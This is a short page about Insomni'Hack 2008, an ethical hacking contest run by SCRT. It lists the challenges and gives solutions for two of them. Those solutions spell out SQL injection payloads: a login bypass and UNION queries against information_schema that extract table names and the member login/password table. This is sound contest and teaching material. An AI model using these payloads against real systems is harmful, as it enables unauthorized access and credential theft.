08th
February 2008, SCRT has organized the first ethical hacking contest
in Western Switzerland.
The contest is now over
the challenges
We will present here some solutions to the challenges
No
Challange name
Points
Access
-
-
-
1
Methadone
200
hackthis.insomni.hack/methadone
6
Highlander
600
begin.insomni.hack
8
Oxymore
200
hackthis.insomni.hack/oxymore
9
NoNo
100
hackthis.insomni.hack/NoNo
5
Ventriloque
600
www.insomni.hack/ventriloque
3
Cherche&Trouve
1000
www.insomni.hack/cherche&trouve
2
Héroïne
800
hackthis.insomni.hack/heroine
7
Cascade Scoubidou
200
www.insomni.hack/cascade
7
Cascade orthodoxe
400
www.insomni.hack/cascade
7
Cascade de chiffres
600
www.insomni.hack/cascade
7
Cascade old-school
800
www.insomni.hack/cascade
10
OUAIP
500
Epreuve 1 :
méthadone
Simple injection SQL OR 'x'='x
permettait de contourner la protection par login mot de
passe.
Epreuve 2 :
Heroïne
Harder SQL Injection
Here are the steps to pass this challenge
Find the right table : '
OR 'x'='x' union select table_name,table_type,table_schema from
information_schema.tables where 'x'='x Or find
directly the right column : ' ' OR 'x'='x' union select
table_name,column_name,table_schema from information_schema.columns
where 'x'='x
SELECT * FROM hackthis_BDD.membres WHERE identifiant = 'toto' AND
motpasse = ' ' OR 'x'='x' union select
table_name,table_schema,column_name from information_schema.columns
where 'x'='x' get the login/password: ' OR 'x'='x' union select * from
membres where 'x'='x
Insomni'Hack 08
